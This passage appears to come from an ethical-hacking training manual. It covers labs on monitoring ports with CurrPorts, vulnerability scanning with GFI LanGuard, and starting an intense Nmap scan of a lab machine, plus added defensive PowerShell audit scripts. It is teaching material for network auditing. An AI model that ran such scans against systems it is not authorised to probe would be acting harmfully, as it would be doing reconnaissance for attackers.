In this lab, you need to:
■ Scan the system for currently opened TCP/IP and UDP ports
■ Gather information on the ports and processes that are opened
■ List all the IP addresses that currently have established connections
■ Close unwanted TCP connections and kill the process that opened the ports


Lab Environment
To perform the lab, you need:
■ CurrPorts located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Scanning Tools\CurrPorts
■ You can also download the latest version of CurrPorts from the link http://www.nirsoft.net/utils/cports.html
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ Double-click cports.exe to run this tool
■ Administrator privileges to run the CurrPorts tool
You can download the CurrPorts tool from http://www.nirsoft.net.

Lab Duration
Time: 10 Minutes

Overview of Monitoring TCP/IP
Monitoring TCP/IP ports checks whether multiple IP connections are established. Scanning TCP/IP ports gets information on all the opened TCP and UDP ports and also displays all established IP addresses on the server.

Lab Tasks
The CurrPorts utility is a standalone executable and doesn't require any installation process or additional DLLs (Dynamic Link Libraries). Extract CurrPorts to the desired location and double-click cports.exe to launch it.
TASK 1: Discover TCP/IP Connections
1. Launch CurrPorts. It automatically displays the process name, ports, IP and remote addresses, and their states.

FIGURE 4.1: The CurrPorts main window with all processes, ports, and IP addresses


2. CurrPorts lists all the processes and their IDs, protocols used, local and remote IP address, local and remote ports, and remote host names.
3. To view all the reports as an HTML page, click View -> HTML Reports - All Items.

FIGURE 4.2: CurrPorts with HTML Report - All Items
In the bottom left of the CurrPorts window, the status of total ports and remote connections is displayed.
4. The HTML report automatically opens using the default browser.

To check the countries of the remote IP addresses, you have to download the latest IP to Country file and put the IpToCountry.csv file in the same folder as cports.exe.

FIGURE 4.3: The Web browser displaying CurrPorts Report - All Items
5. To save the generated CurrPorts report from the web browser, click File -> Save Page As... (Ctrl+S).


CurrPorts allows you to save all changes (added and removed connections) into a log file. In order to start writing to the log file, check the 'Log Changes' option under the File menu. By default, the log file is saved as cports.log in the same folder where cports.exe is located. You can change the default log file name by setting the LogFilename entry in the cports.cfg file.

FIGURE 4.4: The Web browser to Save CurrPorts Report - All Items
6. To view only the selected report as an HTML page, select the reports and click View -> HTML Reports - Selected Items.

Be aware! The log file is updated only when you refresh the ports list manually, or when the Auto Refresh option is turned on.

FIGURE 4.5: CurrPorts with HTML Report - Selected Items
7. The selected report automatically opens using the default browser. You can also right-click on the Web page and save the report.


In the filters dialog box, you can add one or more filter strings (separated by spaces, semicolons, or CRLF). The syntax for a filter string is: [include | exclude]:[local | remote | both | process]:[tcp | udp | tcpudp]:[IPRange | PortsRange].

FIGURE 4.6: The Web browser displaying CurrPorts with HTML Report - Selected Items
8. To save the generated CurrPorts report from the web browser, click File -> Save Page As... (Ctrl+S).

Command-line option: /stext <Filename> saves the list of all opened TCP/UDP ports into a regular text file.

FIGURE 4.7: The Web browser to Save CurrPorts with HTML Report - Selected Items
9. To view the properties of a port, select the port and click File -> Properties.
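The filter-string syntax described in the note above ([include | exclude]:[local | remote | both | process]:[tcp | udp | tcpudp]:[IPRange | PortsRange]) is easiest to understand by running it. The following is an added PowerShell example, not code from the lab or from NirSoft's CurrPorts: a small interpreter for that syntax applied to constructed connection records shaped like the CurrPorts columns. It assumes that include filters are OR-ed (a row is shown if it matches any of them), that exclude filters then remove rows, that a process filter is written include:process:<name>, and that ranges are written low-high.

```powershell
# Added example, not code from the lab or from NirSoft's CurrPorts: an interpreter for
# the CurrPorts filter-string syntax, run against constructed connection records so the
# effect of a filter can be checked offline. Assumed semantics: include filters are
# OR-ed, exclude filters then remove rows, process filters look like
# include:process:<name>, and IP/port ranges are written low-high.

function ConvertTo-IPv4Number([string]$Address) {
    # Turn a dotted-quad into an integer so address ranges compare numerically.
    $ip = [System.Net.IPAddress]::Parse($Address)
    if ($ip.AddressFamily -ne 'InterNetwork') { return -1 }   # IPv6 never matches an IPv4 range
    $b = $ip.GetAddressBytes()
    return ([int64]$b[0] -shl 24) + ([int64]$b[1] -shl 16) + ([int64]$b[2] -shl 8) + [int64]$b[3]
}

function ConvertFrom-CportsFilter([string]$FilterText) {
    # Filter strings are separated by spaces, semicolons or CRLF.
    foreach ($token in ($FilterText -split '[\s;]+' | Where-Object { $_ })) {
        $parts  = $token -split ':'
        $action = $parts[0].ToLowerInvariant()
        if ($action -notin 'include', 'exclude') { throw "Unknown action in filter '$token'" }
        $scope = $parts[1].ToLowerInvariant()
        if ($scope -eq 'process') {
            [pscustomobject]@{ Action = $action; Scope = 'process'; Process = $parts[2] }
            continue
        }
        if ($parts.Count -ne 4 -or $scope -notin 'local', 'remote', 'both') { throw "Malformed filter '$token'" }
        $low, $high = $parts[3] -split '-', 2
        if (-not $high) { $high = $low }          # a single value is a range of one
        $isIp = $low.Contains('.')                # IPRange vs PortsRange
        [pscustomobject]@{
            Action = $action
            Scope  = $scope
            Proto  = $parts[2].ToLowerInvariant()
            IsIP   = $isIp
            Low    = if ($isIp) { ConvertTo-IPv4Number $low } else { [int]$low }
            High   = if ($isIp) { ConvertTo-IPv4Number $high } else { [int]$high }
        }
    }
}

function Test-CportsFilter($Filter, $Connection) {
    if ($Filter.Scope -eq 'process') { return ($Connection.ProcessName -eq $Filter.Process) }
    if ($Filter.Proto -ne 'tcpudp' -and $Filter.Proto -ne $Connection.Protocol.ToLower()) { return $false }
    $sides = switch ($Filter.Scope) { 'local' { 'Local' } 'remote' { 'Remote' } 'both' { 'Local', 'Remote' } }
    foreach ($side in $sides) {
        $value = if ($Filter.IsIP) { $Connection."${side}Address" } else { $Connection."${side}Port" }
        if ($null -eq $value -or "$value" -eq '') { continue }   # listening sockets have no remote side
        $n = if ($Filter.IsIP) { ConvertTo-IPv4Number $value } else { [int]$value }
        if ($n -ge $Filter.Low -and $n -le $Filter.High) { return $true }
    }
    return $false
}

function Select-CportsConnections([string]$FilterText, [object[]]$Connections) {
    $filters  = @(ConvertFrom-CportsFilter $FilterText)
    $includes = @($filters | Where-Object { $_.Action -eq 'include' })
    $excludes = @($filters | Where-Object { $_.Action -eq 'exclude' })
    foreach ($c in $Connections) {
        $shown = ($includes.Count -eq 0) -or (@($includes | Where-Object { Test-CportsFilter $_ $c }).Count -gt 0)
        if ($shown -and @($excludes | Where-Object { Test-CportsFilter $_ $c }).Count -gt 0) { $shown = $false }
        if ($shown) { $c }
    }
}

# Constructed records modelled on the CurrPorts columns (not captured from a real host).
$sampleConnections = @(
    [pscustomobject]@{ ProcessName = 'chrome.exe';  Protocol = 'TCP'; LocalAddress = '10.0.0.7';  LocalPort = 4119; RemoteAddress = '173.194.36.26'; RemotePort = 80;    State = 'Established' }
    [pscustomobject]@{ ProcessName = 'chrome.exe';  Protocol = 'TCP'; LocalAddress = '10.0.0.7';  LocalPort = 4148; RemoteAddress = '173.194.36.26'; RemotePort = 443;   State = 'Established' }
    [pscustomobject]@{ ProcessName = 'firefox.exe'; Protocol = 'TCP'; LocalAddress = '10.0.0.7';  LocalPort = 4163; RemoteAddress = '173.194.36.15'; RemotePort = 443;   State = 'Established' }
    [pscustomobject]@{ ProcessName = 'firefox.exe'; Protocol = 'TCP'; LocalAddress = '127.0.0.1'; LocalPort = 3981; RemoteAddress = '127.0.0.1';     RemotePort = 3982;  State = 'Established' }
    [pscustomobject]@{ ProcessName = 'httpd.exe';   Protocol = 'TCP'; LocalAddress = '0.0.0.0';   LocalPort = 1070; RemoteAddress = '';              RemotePort = $null; State = 'Listening' }
    [pscustomobject]@{ ProcessName = 'svchost.exe'; Protocol = 'UDP'; LocalAddress = '10.0.0.7';  LocalPort = 53;   RemoteAddress = '';              RemotePort = $null; State = '' }
)

$filterText = 'include:remote:tcp:443 include:local:udp:53 exclude:process:chrome.exe'
Select-CportsConnections $filterText $sampleConnections |
    Format-Table ProcessName, Protocol, LocalAddress, LocalPort, RemoteAddress, RemotePort, State -AutoSize
```

With the sample filter, a row survives only if it has remote TCP port 443 or local UDP port 53, and any surviving chrome.exe row is then removed by the exclude filter, so the listening httpd.exe socket (no remote side) and the loopback Firefox pair never match. Rows exported from a real CurrPorts report (for example a /stab file) can be fed to Select-CportsConnections as long as they carry the same property names.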


Command-line option: /stab <Filename> saves the list of all opened TCP/UDP ports into a tab-delimited text file.

FIGURE 4.8: CurrPorts to view properties for a selected port
10. The Properties window appears and displays all the properties for the selected port.
11. Click OK to close the Properties window.
Properties (values shown for the selected firefox.exe connection):
Process Name: firefox.exe
Process ID: 1368
Protocol: TCP
Local Port: 4166
Local Port Name:
Local Address: 10.0.0.7
Remote Port: 443
Remote Port Name: https
Remote Address: 173.194.36.0
Remote Host Name: bom04s01-in-f0.1e100.net
State: Established
Process Path: C:\Program Files (x86)\Mozilla Firefox\firefox.exe
Product Name: Firefox
File Description: Firefox
File Version: 14.0.1
Company: Mozilla Corporation
Process Created On: 8/25/2012 2:36:28 PM
User Name: WIN-D39MR5HL9E4\Administrator
Process Services:
Process Attributes:
Added On: 8/25/2012 3:32:58 PM
Module Filename:
Remote IP Country:
Window Title:

Command-line option: /shtml <Filename> saves the list of all opened TCP/UDP ports into an HTML file (Horizontal).

FIGURE 4.9: The CurrPorts Properties window for the selected port


12. To close a TCP connection you think is suspicious, select the process and click File -> Close Selected TCP Connections (or Ctrl+T).
TASK 2: Close TCP Connection

FIGURE 4.10: The CurrPorts Close Selected TCP Connections option window
13. To kill the processes of a port, select the port and click File -> Kill Processes of Selected Ports.

TASK 3: Kill Process

FIGURE 4.11: The CurrPorts Kill Processes of Selected Ports option window
14. To exit from the CurrPorts utility, click File -> Exit. The CurrPorts window closes.

Command-line option: /sverhtml <Filename> saves the list of all opened TCP/UDP ports into an HTML file (Vertical).

FIGURE 4.12: The CurrPorts Exit option window
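Tasks 1 to 3 above (list every open port with its owning process, report it, and close or kill what looks suspicious) can also be carried out with cmdlets built into Windows, which is useful when CurrPorts cannot be copied to a server. The following is an added PowerShell example, not code from the lab or from NirSoft: it builds the same inventory from Get-NetTCPConnection and Get-NetUDPEndpoint, writes an HTML report like the "HTML Report - All Items" view, and offers a confirmed kill of the process owning a chosen local port. It assumes Windows Server 2012 / Windows 8 or later (NetTCPIP module) and an elevated session; the "unidentified application" heuristic used here (no resolvable image path, or an image whose Authenticode signature is not valid) is my assumption, not CurrPorts' own rule.

```powershell
# Added example, not code from the lab or from NirSoft: the CurrPorts workflow of
# Tasks 1-3 done with built-in PowerShell cmdlets. Assumes Windows Server 2012 or
# later (NetTCPIP module) and an elevated session. The "unidentified" heuristic is an
# assumption for this example, not CurrPorts' definition.

function Get-PortInventory {
    $ownerCache = @{}
    function Resolve-Owner([int]$OwnerPid) {
        # Resolve each PID once: name, image path and whether that image is validly signed.
        if (-not $ownerCache.ContainsKey($OwnerPid)) {
            $p = Get-Process -Id $OwnerPid -ErrorAction SilentlyContinue
            $path = if ($p) { $p.Path } else { $null }
            $signed = $false
            if ($path) {
                $sig = Get-AuthenticodeSignature -FilePath $path -ErrorAction SilentlyContinue
                $signed = [bool]$sig -and ($sig.Status -eq 'Valid')
            }
            $ownerCache[$OwnerPid] = [pscustomobject]@{
                Name = if ($p) { $p.ProcessName } else { '<unknown>' }
                Path = $path
                # PID 0 (Idle) and 4 (System) have no image path by design; do not flag them.
                Unidentified = ($OwnerPid -gt 4) -and ((-not $path) -or (-not $signed))
            }
        }
        return $ownerCache[$OwnerPid]
    }

    $tcp = @(foreach ($c in Get-NetTCPConnection) {
        $o = Resolve-Owner $c.OwningProcess
        [pscustomobject]@{
            ProcessName = $o.Name; ProcessID = $c.OwningProcess; Protocol = 'TCP'
            LocalAddress = $c.LocalAddress; LocalPort = $c.LocalPort
            RemoteAddress = $c.RemoteAddress; RemotePort = $c.RemotePort
            State = [string]$c.State; ProcessPath = $o.Path; Unidentified = $o.Unidentified
        }
    })
    $udp = @(foreach ($u in Get-NetUDPEndpoint) {
        $o = Resolve-Owner $u.OwningProcess
        [pscustomobject]@{
            ProcessName = $o.Name; ProcessID = $u.OwningProcess; Protocol = 'UDP'
            LocalAddress = $u.LocalAddress; LocalPort = $u.LocalPort
            RemoteAddress = ''; RemotePort = $null            # UDP endpoints have no peer
            State = ''; ProcessPath = $o.Path; Unidentified = $o.Unidentified
        }
    })
    return $tcp + $udp
}

function Export-PortReport {
    # Same content as CurrPorts' "HTML Report - All Items"; -RemoteOnly keeps established rows.
    param([Parameter(Mandatory = $true)][string]$Path, [switch]$RemoteOnly)
    $rows = Get-PortInventory
    if ($RemoteOnly) { $rows = @($rows | Where-Object { $_.State -eq 'Established' }) }
    $rows | Sort-Object ProcessName, Protocol, LocalPort |
        ConvertTo-Html -Title 'TCP/UDP Ports List' -PreContent '<h2>TCP/UDP Ports List</h2>' |
        Set-Content -Path $Path
    return $rows
}

function Stop-PortOwner {
    # Equivalent of File -> Kill Processes of Selected Ports, but asks for confirmation first.
    [CmdletBinding(SupportsShouldProcess = $true, ConfirmImpact = 'High')]
    param([Parameter(Mandatory = $true)][int]$LocalPort)
    $owners = Get-PortInventory |
        Where-Object { $_.LocalPort -eq $LocalPort -and $_.ProcessID -gt 4 } |
        Select-Object ProcessName, ProcessID -Unique
    foreach ($o in $owners) {
        if ($PSCmdlet.ShouldProcess("$($o.ProcessName) (PID $($o.ProcessID)) owning local port $LocalPort", 'Stop-Process')) {
            Stop-Process -Id $o.ProcessID -Force
        }
    }
}

$inventory = Export-PortReport -Path "$env:USERPROFILE\Desktop\ports-report.html"
# Rows CurrPorts would colour pink: ports owned by applications that cannot be identified.
$inventory | Where-Object { $_.Unidentified } |
    Format-Table ProcessName, ProcessID, Protocol, LocalPort, RemoteAddress, RemotePort, ProcessPath -AutoSize
# Status line like the bottom of the CurrPorts window.
'{0} total ports, {1} remote connections' -f $inventory.Count, @($inventory | Where-Object { $_.State -eq 'Established' }).Count
# Stop-PortOwner -LocalPort 1070    # prompts before terminating the owning process
```

Get-PortInventory is the piece to keep: the other two are thin wrappers over it, and the same objects can be piped to Export-Csv for the kind of record the Lab Analysis section asks for. Stop-PortOwner deliberately skips PID 0 and 4 and uses ShouldProcess, so a mistyped port number cannot silently take down a system process.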

Lab Analysis
Document all the IP addresses, open ports and their running applications, and protocols discovered during the lab.
In the command line, the syntax of the /close command is: /close <Local Address> <Local Port> <Remote Address> <Remote Port>.

Tool/Utility: CurrPorts
Information Collected/Objectives Achieved:
Profile Details: Network scan for open ports
Scanned Report:
■ Process Name
■ Process ID
■ Protocol
■ Local Port
■ Local Address
■ Remote Port
■ Remote Port Name
■ Remote Address
■ Remote Host Name


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

CurrPorts allows you to easily translate all menus, dialog boxes, and strings to other languages.
1. Analyze the results from CurrPorts by creating a filter string that displays only packets with remote TCP port 80 and UDP port 53 and running it.
2. Analyze and evaluate the output results by creating a filter that displays only the opened ports in the Firefox browser.
3. Determine the use of each of the following options that are available under the Options menu of CurrPorts:
a. Display Established
b. Mark Ports Of Unidentified Applications
c. Display Items Without Remote Address
d. Display Items With Unknown State

Internet Connection Required
☐ Yes ☑ No
Platform Supported
☑ Classroom ☑ iLabs


Lab

Scanning for Network Vulnerabilities Using the GFI LanGuard 2012
GFI LANguard scans networks and ports to detect, assess, and correct any security vulnerabilities that are found.

Lab Scenario
You have learned in the previous lab to monitor TCP/IP and UDP ports on your local computer or network using CurrPorts. This tool will automatically mark with a pink color suspicious TCP/UDP ports owned by unidentified applications. To prevent attacks pertaining to TCP/IP, you can select one or more items, and then close the selected connections.
Your company's web server is hosted by a large ISP and is well protected behind a firewall. Your company needs to audit the defenses used by the ISP. After starting a scan, a serious vulnerability was identified but not immediately corrected by the ISP. An evil attacker uses this vulnerability and places a backdoor on the server. Using the backdoor, the attacker gets complete access to the server and is able to manipulate the information on the server. The attacker also uses the server to leapfrog and attack other servers on the ISP network from this compromised one.

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

As a security administrator and penetration tester for your company, you need to conduct penetration testing in order to determine the list of threats and vulnerabilities to the network infrastructure you manage. In this lab, you will be using GFI LanGuard 2012 to scan your network to look for vulnerabilities.

Lab Objectives
The objective of this lab is to help students conduct vulnerability scanning, patch management, and network auditing.
In this lab, you need to:
■ Perform a vulnerability scan


■ Audit the network
■ Detect vulnerable ports
■ Identify security vulnerabilities
■ Correct security vulnerabilities with remedial action
You can download GFI LANguard from http://www.gfi.com.
Lab Environment
To perform the lab, you need:
■ GFI LanGuard located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Vulnerability Scanning Tools\GFI LanGuard
■ You can also download the latest version of GFI LanGuard from the link http://www.gfi.com/lannetscan
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ A computer running Windows Server 2012 as the host machine
■ Windows Server 2008 running in a virtual machine
■ Microsoft .NET Framework 2.0
■ Administrator privileges to run the GFI LANguard Network Security Scanner
■ It requires the user to register on the GFI website http://www.gfi.com/lannetscan to get a license key
■ Complete the subscription and get an activation code; the user will receive an email that contains an activation code
GFI LANguard works on Microsoft Windows Server 2008 Standard/Enterprise, Windows Server 2003 Standard/Enterprise, Windows 7 Ultimate, Microsoft Small Business Server 2008 Standard, Small Business Server 2003 (SP1), and Small Business Server 2000 (SP2).
Lab Duration
Time: 10 Minutes

Overview of Scanning Network
As an administrator, you often have to deal separately with problems related to vulnerability issues, patch management, and network auditing. It is your responsibility to address all the vulnerability management needs and act as a virtual consultant to give a complete picture of a network setup, provide risk analysis, and maintain a secure and compliant network state faster and more effectively.
Security scans or audits enable you to identify and assess possible risks within a network. Auditing operations imply any type of checking performed during a network security audit. These include open port checks, missing Microsoft patches and vulnerabilities, service information, and user or process information.
GFI LANguard includes default configuration settings that allow you to run immediate scans soon after the installation is complete.
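To make the audit checks listed above concrete before running the scanner, here is an added PowerShell example, not part of the lab or of GFI LanGuard, that performs three of them locally: open (listening) TCP ports, missing Microsoft patches through the Windows Update Agent, and a service-configuration vulnerability check. It assumes Windows Server 2012 or later (NetTCPIP module and a Windows Update Agent that can reach WSUS or Microsoft Update). The unquoted-service-path test and the vulnerability-level roll-up are assumed examples for illustration, not LanGuard's own checks or scoring.

```powershell
# Added example, not part of the lab or of GFI LanGuard: a local self-audit covering
# open ports, missing Microsoft patches and one service-configuration check, returned as
# objects that can be set against a scanner's findings. Assumes Windows Server 2012 or
# later. The unquoted-service-path test and the roll-up are assumed examples, not
# LanGuard's own checks or scoring.

function Get-ListeningPorts {
    # Open-port check: every TCP listener with its owning process.
    Get-NetTCPConnection -State Listen |
        Select-Object LocalAddress, LocalPort, OwningProcess,
            @{ Name = 'ProcessName'; Expression = { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).ProcessName } } |
        Sort-Object LocalPort
}

function Get-MissingUpdates {
    # Missing-patch check through the Windows Update Agent COM API: updates that apply to
    # this host but are not installed (and not hidden by an administrator).
    $session  = New-Object -ComObject Microsoft.Update.Session
    $searcher = $session.CreateUpdateSearcher()
    $result   = $searcher.Search("IsInstalled=0 and Type='Software' and IsHidden=0")
    foreach ($u in $result.Updates) {
        [pscustomobject]@{
            Title    = $u.Title
            Severity = $u.MsrcSeverity      # Critical / Important / Moderate / Low, or empty
            KB       = (@($u.KBArticleIDs) | ForEach-Object { "KB$_" }) -join ', '
        }
    }
}

function Get-UnquotedServicePaths {
    # Service-configuration check: an image path that contains spaces but is not quoted
    # lets the Service Control Manager resolve the wrong executable if a file with a
    # matching prefix exists; report such services so the path can be quoted.
    Get-WmiObject -Class Win32_Service |
        Where-Object {
            $_.PathName -and
            $_.PathName -notmatch '^"' -and
            $_.PathName -notmatch '^[A-Za-z]:\\Windows\\' -and
            (($_.PathName -split '\.exe')[0]) -match ' '
        } |
        Select-Object Name, StartMode, State, PathName
}

function Invoke-LocalAudit {
    $ports    = @(Get-ListeningPorts)
    $services = @(Get-UnquotedServicePaths)
    $updates  = @()
    try { $updates = @(Get-MissingUpdates) } catch { Write-Warning "Update search failed: $_" }

    # Roll-up assumed for this example: Critical/Important patches missing or a weak
    # service path gives High, any other missing patch Medium, otherwise Low.
    $severe = @($updates | Where-Object { $_.Severity -in 'Critical', 'Important' })
    $level = if ($severe.Count -gt 0 -or $services.Count -gt 0) { 'High' } elseif ($updates.Count -gt 0) { 'Medium' } else { 'Low' }

    [pscustomobject]@{
        Computer             = $env:COMPUTERNAME
        VulnerabilityLevel   = $level
        ListeningPorts       = $ports
        MissingUpdates       = $updates
        UnquotedServicePaths = $services
    }
}

$audit = Invoke-LocalAudit
'{0}: vulnerability level {1}, {2} listening ports, {3} missing updates, {4} weak service paths' -f $audit.Computer, $audit.VulnerabilityLevel, $audit.ListeningPorts.Count, $audit.MissingUpdates.Count, $audit.UnquotedServicePaths.Count
$audit.MissingUpdates | Format-Table Severity, KB, Title -AutoSize
$audit.UnquotedServicePaths | Format-Table Name, StartMode, PathName -AutoSize
```

Run it on the same host you point LanGuard at and compare the two missing-update lists: a patch the scanner reports but the Windows Update Agent does not (or the reverse) usually means the host is pulling from a different update source than the scanner's definitions assume, which is worth settling before remediation is scheduled.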


Lab Tasks
Follow the wizard-driven installation steps to install the GFI LANguard network scanner on the host machine Windows Server 2012.
TASK 1: Scanning for Vulnerabilities
1. Navigate to Windows Server 2012 and launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.
Zenmap installs the following files: Nmap Core Files, Nmap Path, WinPcap 4.1.1, Network Interface Import, Zenmap (GUI frontend), Ncat (Modern Netcat), Ndiff.

FIGURE 5.1: Windows Server 2012 - Desktop view
2. Click the GFI LanGuard 2012 app to open the GFI LanGuard 2012 window.

FIGURE 5.2: Windows Server 2012 - Apps
3. The GFI LanGuard 2012 main window appears and displays the Network Audit tab contents.
To execute a scan successfully, GFI LANguard must remotely log on to target computers with administrator privileges.


The default scanning options, which provide quick access to scanning modes, are: Quick scan, Full scan, Launch a custom scan, and Set up a scheduled scan.

FIGURE 5.3: The GFI LANguard main window (Welcome to GFI LanGuard 2012: View Dashboard, Remediate Security Issues, Manage Agents, Launch a Scan; Local Computer Vulnerability Level: High)

Custom scans are recommended when performing a one-time scan with particular scanning parameters/profiles, when performing a scan for particular network threats and/or system information, or to perform a target computer scan using a specific scan profile.
4. Click the Launch a Scan option to perform a network scan.

FIGURE 5.4: The GFI LANguard main window indicating the Launch a Custom Scan option
If intrusion detection software (IDS) is running during scans, GFI LANguard sets off a multitude of IDS warnings and intrusion alerts in these applications.
5. The Launch a New Scan window will appear.
i. In the Scan Target option, select localhost from the drop-down list
ii. In the Profile option, select Full Scan from the drop-down list
iii. In the Credentials option, select currently logged on user from the drop-down list
6. Click Scan.


For large network environments, a Microsoft SQL Server/MSDE database backend is recommended instead of the Microsoft Access database.

FIGURE 5.5: Selecting an option for network scanning
7. Scanning will start; it will take some time to scan the network. See the following figure.

Quick scans have relatively short scan duration times compared to full scans, mainly because quick scans perform vulnerability checks of only a subset of the entire database. It is recommended to run a quick scan at least once a week.
8. After completing the scan, the scan result will show in the left panel.


Types of scans:
■ Scan a single computer: Select this option to scan a local host or one specific computer.
■ Scan a range of computers: Select this option to scan a number of computers defined through an IP range.
■ Scan a list of computers: Select this option to import a list of targets from a file or to select targets from a network list.
■ Scan computers in text file: Select this option to scan targets enumerated in a specific text file.
■ Scan a domain or workgroup: Select this option to scan all targets connected to a domain or workgroup.

FIGURE 5.7: The GFI LanGuard Custom scan wizard (scan completed; Vulnerability level and Results statistics panels)

9. To check the Scan Result Overview, click the IP address of the machine in the right panel
10. It shows the Vulnerability Assessment and Network & Software Audit; click Vulnerability Assessment

FIGURE 5.8: Selecting Vulnerability Assessment option (Vulnerability level panel with possible reasons why no level was computed)


11. It shows all the Vulnerability Assessment indicators by category

During a full scan, GFI LANguard scans target computers to retrieve setup information and identify all security vulnerabilities including:
■ Missing Microsoft updates
■ System software information, including unauthorized applications, incorrect antivirus settings and outdated signatures
■ System hardware information, including connected modems and USB devices

FIGURE 5.9: List of Vulnerability Assessment categories (High, Medium, Low and Potential vulnerabilities; Missing Service Packs and Update Rollups; Missing Security Updates)

12. Click Network & Software Audit in the right panel, and then click System Patching Status, which shows all the system patching statuses
Due to the large amount of information retrieved from scanned targets, full scans often tend to be lengthy. It is recommended to run a full scan at least once every 2 weeks.

FIGURE 5.10: System patching status report (Missing Service Packs and Update Rollups, Missing Security Updates, Missing Non-Security Updates, Installed Security Updates, Installed Non-Security Updates)

13. Click Ports, and under this, click Open TCP Ports

A custom scan is a network audit based on parameters, which you configure on the fly before launching the scanning process. Various parameters can be customized during this type of scan, including:
■ Type of scanning profile (i.e., the type of checks to execute/type of data to retrieve)
■ Scan targets
■ Logon credentials

FIGURE 5.11: TCP/UDP Ports result

14. Click System Information in the right side panel; it shows all the details of the system information
15. Click Password Policy
The next job after a network security scan is to identify which areas and systems require your immediate attention. Do this by analyzing and correctly interpreting the information collected and generated during a network security scan.

FIGURE 5.12: Information of Password Policy

16. Click Groups; it shows all the groups present in the system
A high vulnerability level is the result of vulnerabilities or missing patches whose average severity is categorized as high.

A scheduled scan is a network audit scheduled to run automatically on a specific date/time and at a specific frequency. Scheduled scans can be set to execute once or periodically.

FIGURE 5.13: Information of Groups

17. Click the Dashboard tab; it shows all the scanned network information
It is recommended to use scheduled scans:
■ To perform periodical/regular network vulnerability scans automatically and using the same scanning profiles and parameters
■ To trigger scans automatically after office hours and to generate alerts and auto-distribution of scan results via email
■ To automatically trigger auto-remediation options (e.g., auto download and deploy missing updates)

FIGURE 5.14: Scanned report of the network (Dashboard: Entire Network - 1 computer; Vulnerability Level, Security Sensors, Most Vulnerable Computers, Agent Status, Vulnerability Trend Over Time, Computer Vulnerability Distribution, Computers By Operating System)

Lab Analysis

Document all the results, threats, and vulnerabilities discovered during the scanning and auditing process.


Tool/Utility: GFI LanGuard 2012
Information Collected/Objectives Achieved:
■ Vulnerability Level
■ Vulnerability Assessment
■ System Patching Status
■ Scan Results Details for Open TCP Ports
■ Scan Results Details for Password Policy
■ Dashboard - Entire Network:
  ■ Vulnerability Level
  ■ Security Sensors
  ■ Most Vulnerable Computers
  ■ Agent Status
  ■ Vulnerability Trend Over Time
  ■ Computer Vulnerability Distribution
  ■ Computers by Operating System

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Analyze how GFI LANguard products provide protection against a worm.
2. Evaluate under what circumstances GFI LANguard displays a dialog during patch deployment.
3. Can you change the message displayed when GFI LANguard is performing administrative tasks? If yes, how?

Internet Connection Required
□ Yes  ☑ No
Platform Supported
☑ Classroom  ☑ iLabs


Exploring and Auditing a Network Using Nmap

Nmap (Zenmap is the official Nmap GUI) is a free, open source (license) utility for network exploration and security auditing.

Lab Scenario

In the previous lab you learned to use GFI LanGuard 2012 to scan a network to find out the vulnerability level, system patching status, details for open and closed ports, vulnerable computers, etc. An administrator and an attacker can use the same tools to fix or exploit a system. If an attacker gets to know all the information about vulnerable computers, they will immediately act to compromise those systems using reconnaissance techniques.

Therefore, as an administrator it is very important for you to patch those systems after you have determined all the vulnerabilities in a network, before the attacker audits the network to gain vulnerable information.

Also, as an ethical hacker and network administrator for your company, your job is to carry out daily security tasks, such as network inventory, service upgrade schedules, and the monitoring of host or service uptime. So, you will be guided in this lab to use Nmap to explore and audit a network.

Lab Objectives

The objective of this lab is to help students learn and understand how to perform a network inventory, manage services and upgrades, schedule network tasks, and monitor host or service uptime and downtime.
In this lab, you need to:
■ Scan TCP and UDP ports
■ Analyze host details and their topology
■ Determine the types of packet filters


■ Record and save all scan reports
■ Compare saved results for suspicious ports

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

Lab Environment

To perform the lab, you need:
■ Nmap located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Scanning Tools\Nmap
■ You can also download the latest version of Nmap from the link http://nmap.org/
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ A computer running Windows Server 2012 as a host machine
■ Windows Server 2008 running on a virtual machine as a guest
■ A web browser with Internet access
■ Administrative privileges to run the Nmap tool

Zenmap works on Windows, including Windows 7 and Server 2003/2008.

Lab Duration

Time: 20 Minutes

Overview of Network Scanning

Network addresses are scanned to determine:
■ What services (application names and versions) those hosts offer
■ What operating systems (and OS versions) they run
■ The type of packet filters/firewalls that are in use and dozens of other characteristics

Lab Tasks

TASK 1: Intense Scan

Follow the wizard-driven installation steps and install Nmap (Zenmap) scanner in the host machine (Windows Server 2012).
1. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop

FIGURE 6.1: Windows Server 2012 - Desktop view


2. Click the Nmap-Zenmap GUI app to open the Zenmap window

Zenmap file installs the following files:
■ Nmap Core Files
■ Nmap Path
■ WinPcap 4.1.1
■ Network Interface Import
■ Zenmap (GUI frontend)
■ Ncat (Modern Netcat)
■ Ndiff

FIGURE 6.2: Windows Server 2012 - Apps
3. The Nmap - Zenmap GUI window appears.

Nmap Syntax: nmap [Scan Type(s)] [Options] {target specification}

FIGURE 6.3: The Zenmap main window

In port scan techniques, only one method may be used at a time, except that UDP scan (-sU) and any one of the SCTP scan types (-sY, -sZ) may be combined with any one of the TCP scan types.

4. Enter the virtual machine Windows Server 2008 IP address (10.0.0.4) in the Target: text field. You are performing a network inventory for the virtual machine.
5. In this lab, the IP address would be 10.0.0.4; it will be different in your lab environment
6. In the Profile: text field, select, from the drop-down list, the type of profile you want to scan. In this lab, select Intense Scan.


7. Click Scan to start scanning the virtual machine.

While Nmap attempts to produce accurate results, keep in mind that all of its insights are based on packets returned by the target machines or the firewalls in front of them.

FIGURE 6.4: The Zenmap main window with Target and Profile entered (Command: nmap -T4 -A -v 10.0.0.4)


The six port states recognized by Nmap:
■ Open
■ Closed
■ Filtered
■ Unfiltered
■ Open|Filtered
■ Closed|Unfiltered

